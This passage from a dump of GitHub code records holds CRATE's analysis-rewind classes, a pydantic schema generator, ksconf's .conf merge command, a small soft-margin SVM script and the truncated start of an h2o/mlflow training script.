self._inc_applied_load.keys():\n # Loop over loading components\n for i in range(len(self._inc_applied_load[ltype])):\n # Compute current applied and incremental loading component\n # (additive decomposition)\n if self._presctype[i] == ltype:\n # Compute current applied loading component\n self._applied_load[ltype][i] = \\\n self._init_conv_hom_state[ltype][i] \\\n + self._total_lfact*(\n self._load[ltype][i]\n - self._init_conv_hom_state[ltype][i])\n # Compute current incremental loading component\n self._inc_applied_load[ltype][i] = \\\n inc_lfact*(self._load[ltype][i]\n - self._init_conv_hom_state[ltype][i])\n#\n# Loading path rewinder\n# =============================================================================\nclass IncrementRewinder:\n \"\"\"Rewind analysis to rewind state increment (initial instant).\n\n Attributes\n ----------\n _rewind_inc : int\n Increment associated with the rewind state.\n _loading_path : LoadingPath\n Loading path instance rewind state.\n _material_state : MaterialState\n CRVE material constitutive state at rewind state.\n _clusters_sct_mf : dict\n Fourth-order strain concentration tensor (matricial form)\n (item, numpy.ndarray (2d)) associated with each material cluster\n (key, str).\n _ref_material : ElasticReferenceMaterial\n Elastic reference material at rewind state.\n _global_strain_mf : numpy.ndarray (1d)\n Global vector of clusters strain tensors (matricial form).\n _farfield_strain_mf : numpy.ndarray (1d)\n Far-field strain tensor (matricial form).\n\n Methods\n -------\n get_rewind_inc(self)\n Get increment associated with the rewind state.\n save_loading_path(self, loading_path)\n Save loading path rewind state.\n get_loading_path(self)\n Get loading path at rewind state.\n save_material_state(self, material_state)\n Save material constitutive state at rewind state.\n save_asca_algorithmic_variables(self, global_strain_mf, \\\n farfield_strain_mf)\n Save ASCA algorithmic variables at rewind state.\n get_asca_algorithmic_variables(self)\n Get ASCA algorithmic variables at rewind state.\n rewind_output_files(self, hres_output=None, efftan_output=None, \\\n ref_mat_output=None, voxels_output=None, \\\n adapt_output=None, vtk_output=None)\n \"\"\"\n def __init__(self, rewind_inc, phase_clusters):\n \"\"\"Increment rewinder constructor.\n\n Parameters\n ----------\n rewind_inc : int\n Increment associated with the rewind state.\n phase_clusters : dict\n Clusters labels (item, list[int]) associated with each material\n phase (key, str).\n \"\"\"\n self._rewind_inc = rewind_inc\n self._phase_clusters = copy.deepcopy(phase_clusters)\n # Initialize loading path at rewind state\n self._loading_path = None\n # Initialize material constitutive state at rewind state\n self._material_state = None\n # Initialize elastic reference material at rewind state\n self._ref_material = None\n # Initialize clusters strain concentration tensors at rewind state\n self._clusters_sct_mf = None\n # Initialize ASCA algorithmic variables\n self._global_strain_mf = None\n self._farfield_strain_mf = None\n # -------------------------------------------------------------------------\n def get_rewind_inc(self):\n \"\"\"Get increment associated with the rewind state.\n\n Returns\n -------\n rewind_inc : int\n Increment associated with the rewind state.\n \"\"\"\n return self._rewind_inc\n # -------------------------------------------------------------------------\n def save_loading_path(self, loading_path):\n \"\"\"Save loading path rewind state.\n\n Parameters\n ----------\n 
loading_path : LoadingPath\n LoadingPath instance.\n \"\"\"\n self._loading_path = copy.deepcopy(loading_path)\n # -------------------------------------------------------------------------\n def get_loading_path(self):\n \"\"\"Get loading path at rewind state.\n\n Returns\n -------\n loading_path : LoadingPath\n Loading path instance rewind state.\n \"\"\"\n return copy.deepcopy(self._loading_path)\n # -------------------------------------------------------------------------\n def save_material_state(self, material_state):\n \"\"\"Save material constitutive state at rewind state.\n\n Parameters\n ----------\n material_state : MaterialState\n CRVE material constitutive state at rewind state.\n \"\"\"\n self._material_state = copy.deepcopy(material_state)\n # -------------------------------------------------------------------------\n def get_material_state(self, crve):\n \"\"\"Get material constitutive state at rewind state.\n\n Parameters\n ----------\n crve : CRVE\n Cluster-Reduced Representative Volume Element.\n\n Returns\n -------\n material_state : MaterialState\n CRVE material constitutive state at rewind state.\n \"\"\"\n # If the current CRVE clustering is coincident with the CRVE clustering\n # at the rewind state, simply return the material constitutive state\n # stored at rewind state. Otherwise, perform a suitable transfer of\n # state variables between the rewind state CRVE clustering and the\n # current CRVE clustering\n if self._phase_clusters == crve.get_cluster_phases():\n # Return material constitutive state stored at rewind state\n return copy.deepcopy(self._material_state)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n else:\n # Get clusters state variables at rewind state\n clusters_state_rew = self._material_state.get_clusters_state()\n # Get clusters deformation gradient at rewind state\n clusters_def_gradient_rew_mf = \\\n self._material_state.get_clusters_def_gradient_mf()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Initialize clusters state variables\n clusters_state = {}\n # Initialize clusters deformation gradient\n clusters_def_gradient_mf = {}\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get material phases\n material_phases = crve.get_material_phases()\n # Get cluster-reduced material phases\n cluster_phases = crve.get_cluster_phases()\n # Get clusters associated with each material phase\n phase_clusters = crve.get_phase_clusters()\n # Get clusters volume fraction\n clusters_vf = crve.get_clusters_vf()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Loop over material phases\n for mat_phase in material_phases:\n # Get cluster-reduced material phase\n crmp = cluster_phases[mat_phase]\n # Get clustering type\n clustering_type = crmp.get_clustering_type()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Proceed according to clustering type\n if clustering_type == 'static':\n # Loop over material phase clusters\n for cluster in phase_clusters[mat_phase]:\n # Set cluster state variables\n clusters_state[str(cluster)] = \\\n copy.deepcopy(clusters_state_rew[str(cluster)])\n # Set cluster deformation gradient\n clusters_def_gradient_mf[str(cluster)] = copy.deepcopy(\n clusters_def_gradient_rew_mf[str(cluster)])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n elif clustering_type == 'adaptive':\n # Get cluster-reduced material phase clustering tree nodes\n clustering_tree_nodes, root_cluster_node = \\\n 
crmp.get_clustering_tree_nodes()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get rewind state cluster nodes\n rewind_clusters_nodes = []\n for cluster in self._phase_clusters[mat_phase]:\n rewind_clusters_nodes.append(\n clustering_tree_nodes[str(cluster)])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Initialize node walker\n node_walker = anytree.walker.Walker()\n # Loop over material phase clusters\n for cluster in phase_clusters[mat_phase]:\n # Get cluster node\n cluster_node = clustering_tree_nodes[str(cluster)]\n # Build walk from cluster node up to the root node\n node_walk_to_root = node_walker.walk(cluster_node,\n root_cluster_node)\n # Loop over walk nodes\n for node in node_walk_to_root[0]:\n # Find hierarchically closest rewind state cluster\n # node\n if node in rewind_clusters_nodes:\n # Get node cluster\n parent_cluster = int(node.name)\n # Set cluster state variables\n clusters_state[str(cluster)] = copy.deepcopy(\n clusters_state_rew[str(parent_cluster)])\n # Set cluster deformation gradient\n clusters_def_gradient_mf[str(cluster)] = \\\n copy.deepcopy(clusters_def_gradient_rew_mf[\n str(parent_cluster)])\n # Skip to the following cluster\n break\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n else:\n raise RuntimeError('Unknown material phase clustering '\n 'type.')\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Set material constitutive state at rewind state according to the\n # current clustering\n self._material_state.set_rewind_state_updated_clustering(\n phase_clusters, clusters_vf, clusters_state,\n clusters_def_gradient_mf)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return material constitutive state stored at rewind state\n # according to the updated clustering\n return copy.deepcopy(self._material_state)\n # -------------------------------------------------------------------------\n def save_reference_material(self, ref_material):\n \"\"\"Save elastic reference material at rewind state.\n\n Parameters\n ----------\n ref_material : ElasticReferenceMaterial\n Elastic reference material at rewind state.\n \"\"\"\n # Save elastic reference material\n self._ref_material = copy.deepcopy(ref_material)\n # -------------------------------------------------------------------------\n def get_reference_material(self):\n \"\"\"Get elastic reference material at rewind state.\n\n Returns\n -------\n ref_material : ElasticReferenceMaterial\n Elastic reference material at rewind state.\n \"\"\"\n return copy.deepcopy(self._ref_material)\n # -------------------------------------------------------------------------\n def save_clusters_sct(self, clusters_sct_mf):\n \"\"\"Save clusters strain concentration tensors at rewind state.\n\n Parameters\n ----------\n clusters_sct_mf : dict\n Fourth-order strain concentration tensor (matricial form)\n (item, numpy.ndarray (2d)) associated with each material cluster\n (key, str).\n \"\"\"\n # Save clusters strain concentration tensors\n self._clusters_sct_mf = copy.deepcopy(clusters_sct_mf)\n # -------------------------------------------------------------------------\n def get_clusters_sct(self):\n \"\"\"Get clusters strain concentration tensors at rewind state.\n\n Returns\n -------\n clusters_sct_mf : dict\n Fourth-order strain concentration tensor (matricial form)\n (item, numpy.ndarray (2d)) associated with each material cluster\n (key, str).\n \"\"\"\n # Return clusters strain concentration tensors\n return copy.deepcopy(self._clusters_sct_mf)\n # 
-------------------------------------------------------------------------\n def save_asca_algorithmic_variables(self, global_strain_mf,\n farfield_strain_mf):\n \"\"\"Save ASCA algorithmic variables at rewind state.\n\n Parameters\n ----------\n global_strain_mf : numpy.ndarray (1d)\n Global vector of clusters strain tensors (matricial form).\n farfield_strain_mf : numpy.ndarray (1d), default=None\n Far-field strain tensor (matricial form).\n \"\"\"\n # Save global vector of clusters strain tensors\n self._global_strain_mf = copy.deepcopy(global_strain_mf)\n # Save far-field strain tensor\n self._farfield_strain_mf = farfield_strain_mf\n # -------------------------------------------------------------------------\n def get_asca_algorithmic_variables(self):\n \"\"\"Get ASCA algorithmic variables at rewind state.\n\n Returns\n -------\n global_strain_mf : numpy.ndarray (1d)\n Global vector of clusters strain tensors (matricial form).\n farfield_strain_mf : numpy.ndarray (1d), default=None\n Far-field strain tensor (matricial form).\n \"\"\"\n return copy.deepcopy(self._global_strain_mf), \\\n copy.deepcopy(self._farfield_strain_mf)\n # -------------------------------------------------------------------------\n def rewind_output_files(self, hres_output=None, efftan_output=None,\n ref_mat_output=None, voxels_output=None,\n adapt_output=None, vtk_output=None):\n \"\"\"Rewind output files to the rewind state.\n\n Parameters\n ----------\n hres_output : HomResOutput\n Output associated with the homogenized results.\n efftan_output : EffTanOutput\n Output associated with the CRVE effective tangent modulus.\n ref_mat_output : RefMatOutput\n Output associated with the reference material.\n voxels_output : VoxelsOutput\n Output associated with voxels material-related quantities.\n adapt_output : ClusteringAdaptivityOutput\n Output associated with the clustering adaptivity procedures.\n vtk_output : VTKOutput\n Output associated with the VTK files.\n \"\"\"\n # Rewind output files\n if hres_output is not None:\n hres_output.rewind_file(self._rewind_inc)\n if efftan_output is not None:\n efftan_output.rewind_file(self._rewind_inc)\n if ref_mat_output is not None:\n ref_mat_output.rewind_file(self._rewind_inc)\n if voxels_output is not None:\n voxels_output.rewind_file(self._rewind_inc)\n if adapt_output is not None:\n adapt_output.rewind_file(self._rewind_inc)\n if vtk_output is not None:\n vtk_output.rewind_files(self._rewind_inc)\n# =============================================================================\nclass RewindManager:\n \"\"\"Manage analysis rewind operations and evaluate analysis rewind criteria.\n\n Attributes\n ----------\n _n_rewinds : int\n Number of rewind operations.\n _rewind_time : float\n Total time spent in rewind operations and in deleted analysis\n increments.\n _init_time : float\n Reference time.\n\n Methods\n -------\n get_rewind_time(self)\n Get total time of rewind operations and deleted analysis increments.\n update_rewind_time(self, mode='init')\n Update total rewind time.\n is_rewind_available(self)\n Evaluate if rewind operations are available.\n is_save_rewind_state(self, inc)\n Evaluate conditions to save rewind state.\n is_rewinding_criteria(self, inc, material_phases, phase_clusters, \\\n clusters_state)\n Check analysis rewinding criteria.\n get_save_rewind_state_criteria()\n Get available rewind state storage criteria and default parameters.\n get_rewinding_criteria()\n Get rewinding criteria and default parameters.\n \"\"\"\n def __init__(self, 
rewind_state_criterion, rewinding_criterion,\n max_n_rewinds=1):\n \"\"\"Analysis rewind manager constructor.\n\n Parameters\n ----------\n rewind_state_criterion : tuple\n Rewind state storage criterion [0] and associated parameter [1].\n rewinding_criterion : tuple\n Rewinding criterion [0] and associated parameter [1].\n max_n_rewinds : int, default=1\n Maximum number of rewind operations.\n \"\"\"\n self._rewind_state_criterion = rewind_state_criterion\n self._rewinding_criterion = rewinding_criterion\n self._max_n_rewinds = max_n_rewinds\n # Initialize number of rewind operations\n self._n_rewinds = 0\n # Initialize total rewind time\n self._rewind_time = 0\n # -------------------------------------------------------------------------\n def get_rewind_time(self):\n \"\"\"Get total time of rewind operations and deleted analysis increments.\n\n Returns\n -------\n rewind_time : float\n Total time of rewind operations and in deleted analysis increments.\n \"\"\"\n return self._rewind_time\n # -------------------------------------------------------------------------\n def update_rewind_time(self, mode='init'):\n \"\"\"Update total rewind time.\n\n Parameters\n ----------\n mode : {'init', 'update'}, default='init'\n \"\"\"\n if mode == 'init':\n # Set reference initial time\n self._init_time = time.time()\n elif mode == 'update':\n # Update total rewind time\n self._rewind_time += time.time() - self._init_time\n # Set reference initial time\n self._init_time = time.time()\n else:\n raise RuntimeError('Unknown mode.')\n # -------------------------------------------------------------------------\n def is_rewind_available(self):\n \"\"\"Evaluate if rewind operations are available.\n\n Returns\n -------\n is_available : bool\n True if rewind operations are available, False otherwise.\n \"\"\"\n # Initialize rewind operations availability\n is_available = True\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Evaluate maximum number of rewind operations\n if self._n_rewinds >= self._max_n_rewinds:\n is_available = False\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return rewind operations availability\n return is_available\n # -------------------------------------------------------------------------\n def is_save_rewind_state(self, inc):\n \"\"\"Evaluate conditions to save rewind state.\n\n Parameters\n ----------\n inc : int\n Macroscale loading increment.\n\n Returns\n -------\n is_save_state : bool\n True if conditions to save rewind state are satisfied, False\n otherwise.\n \"\"\"\n # Initialize save rewind state flag\n is_save_state = False\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get rewind state criterion\n criterion = self._rewind_state_criterion[0]\n # Evaluate rewind state criterion\n if criterion == 'increment_number':\n # Evaluate increment number\n if inc == self._rewind_state_criterion[1]:\n is_save_state = True\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n else:\n raise RuntimeError('Unknown rewind state criterion.')\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return save rewind state flag\n return is_save_state\n # -------------------------------------------------------------------------\n def is_rewinding_criteria(self, inc, material_phases, phase_clusters,\n clusters_state):\n \"\"\"Check analysis rewinding criteria.\n\n Parameters\n ----------\n inc : int\n Macroscale loading increment.\n material_phases : 
list[str]\n CRVE material phases labels (str).\n phase_clusters : dict\n Clusters labels (item, list[int]) associated with each material\n phase (key, str).\n clusters_state : dict\n Material constitutive model state variables (item, dict) associated\n with each material cluster (key, str).\n\n Returns\n -------\n is_rewind : bool\n True if analysis rewinding criteria are satisfied, False otherwise.\n \"\"\"\n # Initialize analysis rewind flag\n is_rewind = False\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get rewinding criterion\n criterion = self._rewinding_criterion[0]\n # Evaluate analysis rewinding criterion\n if criterion == 'increment_number':\n # Evaluate increment number\n is_rewind = inc == self._rewinding_criterion[1]\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n elif criterion == 'max_acc_p_strain':\n # Evaluate accumulated plastic strain threshold\n for mat_phase in material_phases:\n # Loop over material phase clusters\n for cluster in phase_clusters[mat_phase]:\n # Get cluster state variables\n state_variables = clusters_state[str(cluster)]\n # Check if accumulated plastic strain is cluster state\n # variable\n if 'acc_p_strain' not in state_variables:\n continue\n # Evaluate accumulated plastic strain\n if state_variables['acc_p_strain'] \\\n > self._rewinding_criterion[1]:\n is_rewind = True\n break\n if is_rewind:\n break\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n else:\n raise RuntimeError('Unknown rewinding criterion.')\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Increment number of rewind operations\n if is_rewind:\n self._n_rewinds += 1\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return analysis rewinding flag\n return is_rewind\n # -------------------------------------------------------------------------\n @staticmethod\n def get_save_rewind_state_criteria():\n \"\"\"Get available rewind state storage criteria and default parameters.\n\n Returns\n -------\n available_save_rewind_state_criteria : dict\n Available rewind state storage criteria (key, str) and associated\n default parameters (item).\n \"\"\"\n # Set available rewind state storage criteria\n available_save_rewind_state_criteria = {'increment_number': 0, }\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return\n return available_save_rewind_state_criteria\n # -------------------------------------------------------------------------\n @staticmethod\n def get_rewinding_criteria():\n \"\"\"Get rewinding criteria and default parameters.\n\n Returns\n -------\n available_rewinding_criteria : dict\n Available rewinding criteria (key, str) and associated default\n parameters (item).\n \"\"\"\n # Set available rewinding criteria\n available_rewinding_criteria = {'increment_number': 0,\n 'max_acc_p_strain': 1.0e-10}\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Return\n return available_rewinding_criteria\n","repo_name":"bessagroup/CRATE","sub_path":"src/cratepy/online/loading/macloadincrem.py","file_name":"macloadincrem.py","file_ext":"py","file_size_in_byte":68287,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"27031717760","text":"from swagger_server.schemas.family import Family\nimport yaml\nfrom pydantic import schema\n\n\ndef get_schemas(schema_list=None):\n\n if schema_list is None:\n schema_list = [\n Family\n ]\n\n s = 
schema.schema(\n schema_list,\n ref_prefix=\"#/components/schemas/\",\n )\n return s[\"definitions\"]\n\n\nif __name__ == \"__main__\":\n print(yaml.dump(get_schemas()))\n","repo_name":"karthik-lp/shrey_info","sub_path":"rest_server/swagger_server/schema_generator.py","file_name":"schema_generator.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22900031084","text":"\"\"\"\nSUBCOMMAND: ``ksconf merge --target=<TARGET> <CONF> [ <CONF> ... ]``\n\nUsage example:\n\n.. code-block:: sh\n\n ksconf merge --target=master-props.conf /opt/splunk/etc/apps/*TA*/{default,local}/props.conf\n\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nimport os\n\nfrom ksconf.command import ConfFileProxy, ConfFileType, KsconfCmd, dedent\nfrom ksconf.conf.merge import merge_conf_files\nfrom ksconf.conf.parser import PARSECONF_MID, PARSECONF_STRICT\nfrom ksconf.consts import EXIT_CODE_BAD_ARGS, EXIT_CODE_SUCCESS\nfrom ksconf.util.completers import conf_files_completer\n\n\nclass MergeCmd(KsconfCmd):\n help = \"Merge two or more .conf files\"\n description = dedent(\"\"\"\\\n Merge two or more .conf files into a single combined .conf file.\n This is similar to the way that Splunk logically combines the ``default`` and ``local``\n folders at runtime.\n \"\"\")\n maturity = \"stable\"\n\n def register_args(self, parser):\n parser.add_argument(\"conf\", nargs=\"+\",\n help=\"The source configuration file(s) to collect settings from.\"\n ).completer = conf_files_completer\n parser.add_argument(\"--target\", \"-t\",\n type=ConfFileType(\"r+\", \"none\", parse_profile=PARSECONF_STRICT),\n default=ConfFileProxy(\"\", \"w\", self.stdout), help=dedent(\"\"\"\\\n Destination file for merged configurations.\n If not provided, the merged conf is written to standard output.\"\"\")\n ).completer = conf_files_completer\n\n # This is helpful when writing bash expressions like MyApp/{default,local}/props.conf;\n # when either default or local may not be present.\n parser.add_argument(\"--ignore-missing\", \"-s\", default=False, action=\"store_true\",\n help=\"Silently ignore any missing CONF files.\")\n\n parser.add_argument(\"--in-place\", \"-i\", default=False, action=\"store_true\",\n help=dedent(\"\"\"\n Enable in-place update mode. When selected, the TARGET file will also be considered as\n the base of the merge operation. 
All CONF files will be merged with TARGET.\n When disabled, any existing content within TARGET is ignored and overwritten.\"\"\"))\n\n parser.add_argument(\"--dry-run\", \"-D\", default=False, action=\"store_true\", help=dedent(\"\"\"\\\n Enable dry-run mode.\n Instead of writing to TARGET, preview changes in 'diff' format.\n If TARGET doesn't exist, then show the merged file.\"\"\"))\n parser.add_argument(\"--banner\", \"-b\", default=\"\", help=dedent(\"\"\"\\\n A banner or warning comment added to the top of the TARGET file.\n Used to discourage Splunk admins from editing an auto-generated file.\"\"\"))\n\n def pre_run(self, args):\n if args.in_place:\n if args.target.name == \"\":\n self.stderr.write(\"In-place mode requires '--target=FILE'.\\n\")\n return EXIT_CODE_BAD_ARGS\n # Insert target as the first source CONF file to parse\n args.conf.insert(0, args.target.name)\n\n def run(self, args):\n ''' Merge multiple configuration files into one '''\n self.parse_profile = PARSECONF_MID\n\n if args.ignore_missing:\n cfgs = [self.parse_conf(c) for c in args.conf if os.path.isfile(c) or c == \"-\"]\n else:\n cfgs = [self.parse_conf(conf) for conf in args.conf]\n\n merge_conf_files(args.target, cfgs, dry_run=args.dry_run,\n banner_comment=args.banner)\n return EXIT_CODE_SUCCESS\n","repo_name":"Kintyre/ksconf","sub_path":"ksconf/commands/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"74421579434","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\"\"\"\r\nSoft-margin SVM\r\n\"\"\"\r\n\r\nclass MySVM:\r\n \r\n \r\n def __init__(self,C=1.0,episode=100):\r\n self.alpha = 0.1\r\n self.support_vector_number=[]\r\n self.episode = episode\r\n self.omega = None\r\n self.sita = None\r\n self.C=C\r\n \r\n\r\n \r\n def get_first_lamda(self):\r\n \"\"\"Set the initial values of lambda\"\"\"\r\n self.lamda = np.random.uniform(1,0,len(self.X))\r\n \r\n \r\n \r\n def get_omega(self):\r\n \"\"\"Compute omega\"\"\"\r\n _sum = 0\r\n for _ in range(len(self.Y)):\r\n _sum = _sum + np.dot(self.lamda[_]*self.Y[_],self.X[_])\r\n\r\n self.omega = _sum\r\n \r\n \r\n def get_sita(self):\r\n \"\"\"Among the support vectors, some have positive and some have negative teacher labels.\r\n To remove the bias between their values, if support vectors exist in both the\r\n positive-label region and the negative-label region, define the bias value\r\n self.sita from their average.\r\n \"\"\"\r\n _p=[]\r\n _n=[]\r\n for _ in self.support_vector_number:\r\n if self.Y[_]==1:\r\n _p.append(_)\r\n else:\r\n _n.append(_)\r\n if (len(_p) and len(_n)) !=0:\r\n self.sita = -0.5 * (np.dot(self.omega.T,self.X[_p[-1]])+np.dot(self.omega.T,self.X[_n[0]]))\r\n else:\r\n self.sita = self.Y[self.support_vector_number[-1]]-np.dot(self.omega.T,self.X[self.support_vector_number[-1]])\r\n\r\n \r\n def read_csv(self):\r\n \"\"\"Change this depending on the data being read\"\"\"\r\n \r\n self.X = np.loadtxt(fname=\"data1.csv\",dtype='float',skiprows=5,usecols=(4,7),delimiter=',')\r\n self.Y = np.loadtxt(fname=\"data1.csv\",dtype= 'unicode',skiprows=5,usecols=(1),delimiter=',')\r\n \r\n \r\n for _ in range(len(self.Y)):\r\n if '雨' in self.Y[_]: # '雨' means 'rain' in the weather labels\r\n self.Y[_] = 1\r\n \r\n else:\r\n self.Y[_] = -1\r\n \r\n #self.X = np.loadtxt(fname=\"testdata.csv\",dtype='float',skiprows=1,usecols=(0,1),delimiter=',')\r\n #self.Y = np.loadtxt(fname=\"testdata.csv\",dtype= 'float',skiprows=1,usecols=(2),delimiter=',')\r\n self.Y = self.Y.astype(float)\r\n \r\n \r\n def standardzation(self):\r\n \"\"\"Standardize the original data\"\"\"\r\n self.raw_X = self.X\r\n self.X = (self.X-self.X.mean(keepdims=True))/self.X.std(keepdims=True)\r\n \r\n \r\n def 
restandardzation(self):\r\n \"\"\"Restore the standardized data back to the original data\"\"\"\r\n self.X = self.raw_X\r\n \r\n \r\n def limit_lamda(self):\r\n \"\"\"Normalization to satisfy the constraint that the sum of Lagrange multipliers times teacher labels is zero.\r\n\r\n Split the Lagrange multipliers by the sign of their teacher label and, so that each group\r\n sums to one, divide every value by the sum of the lambdas with positive teacher labels\r\n or by the sum of the lambdas with negative teacher labels, respectively.\r\n \"\"\"\r\n _sum1 = 0\r\n _sum2 = 0\r\n for _ in range(len(self.Y)):\r\n if self.Y[_]==1:\r\n _sum1 = _sum1 + self.lamda[_]*self.Y[_]\r\n else:\r\n _sum2 = _sum2 + self.lamda[_]*(-self.Y[_])\r\n \r\n \r\n\r\n for _ in range(len(self.Y)):\r\n if self.Y[_]==1:\r\n self.lamda[_] = self.lamda[_]/_sum1\r\n else:\r\n self.lamda[_] = self.lamda[_]/_sum2\r\n \r\n \r\n def gradient_descent(self):\r\n \"\"\"Update rule\"\"\"\r\n for _i in range(len(self.lamda)):\r\n _sum = 0\r\n for _j in range(len(self.Y)):\r\n _sum = _sum + self.lamda[_j]*self.Y[_i]*self.Y[_j]*( np.dot(self.X[_j].T,self.X[_i]) )\r\n self.lamda[_i] = self.lamda[_i] + self.alpha*(1-_sum)\r\n \r\n\r\n def main(self):\r\n \"\"\"Main routine\"\"\"\r\n \"\"\"First, prepare the data\"\"\"\r\n self.read_csv()\r\n self.standardzation()\r\n self.get_first_lamda()\r\n \r\n \"\"\"\r\n Optimize by steepest descent.\r\n On every update, renormalize lambda so that it satisfies the constraint.\r\n \"\"\"\r\n for _ in range(self.episode):\r\n \r\n self.limit_lamda()\r\n \r\n self.gradient_descent()\r\n\r\n self.limit_lamda()\r\n self.restandardzation()\r\n\r\n \"\"\"Extract the support vectors\"\"\"\r\n for _ in range(len(self.lamda)):\r\n if self.lamda[_]>0 and self.lamda[_]<=self.C:\r\n self.support_vector_number.append(_)\r\n\r\n \"\"\"Compute omega and sita\"\"\"\r\n self.get_omega()\r\n self.get_sita()\r\n\r\n \r\nif __name__ == \"__main__\":\r\n \r\n \"\"\"The default value of C is 1.0; the default number of steepest-descent iterations is 100\"\"\"\r\n svm=MySVM(C=0.2,episode=10)\r\n svm.main()\r\n\r\n print(svm.lamda)\r\n print(svm.omega,svm.sita)\r\n \r\n for _ in svm.support_vector_number:\r\n print(svm.X[_])\r\n \r\n \r\n \r\n a= -svm.omega[0]/svm.omega[1]\r\n xx= np.linspace(0,20)\r\n yy= a*xx - (svm.sita)/svm.omega[1]\r\n\r\n\r\n\r\n \r\n plt.plot(xx, yy, 'k-')\r\n \r\n plt.scatter(svm.X[:,0], svm.X[:,1],s=80, facecolors='none')\r\n plt.scatter(svm.X[:, 0], svm.X[:, 1], c=svm.Y)\r\n\r\n \r\n plt.axis('tight')\r\n\r\n plt.show()\r\n\r\n","repo_name":"yamatomatsuda/SVM","sub_path":"SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":5410,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6516120808","text":"import matplotlib\nimport argparse\nimport mlflow\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\nfrom h2o.grid.grid_search import H2OGridSearch\nimport h2o\nimport numpy as np\nimport pyarrow.parquet as pq\nfrom common_functions import get_metrics, log_metrics, log_artifacts, split_df, move_files, file_swap_s3\nimport os\nimport glob\nimport configparser\nimport s3fs\nimport sys\nimport random\nmatplotlib.use('Agg')\n\n\ndef get_data(access_key, secret_key, location):\n\n # access s3 file system\n s3 = s3fs.S3FileSystem(key=access_key, secret=secret_key)\n\n # get parquet file from s3 as pandas data frame\n df = pq.ParquetDataset(location, filesystem=s3)\\\n .read_pandas()\\\n .to_pandas()\n\n return df\n\n\ndef convert_vars(train, test):\n\n to_categorical_list = [\n 'away_rest',\n 'home_rest',\n 'rest_spread',\n 'home_ranking_quantile',\n 'away_ranking_quantile',\n 'home_position',\n 'away_position',\n 'home_previous_result',\n 'away_previous_result',\n 'home_wins_in_a_row',\n 'home_losses_in_a_row',\n 'away_wins_in_a_row',\n 'away_losses_in_a_row',\n 'day_of_week',\n 'hour',\n ]\n\n k = random.randrange(1, 
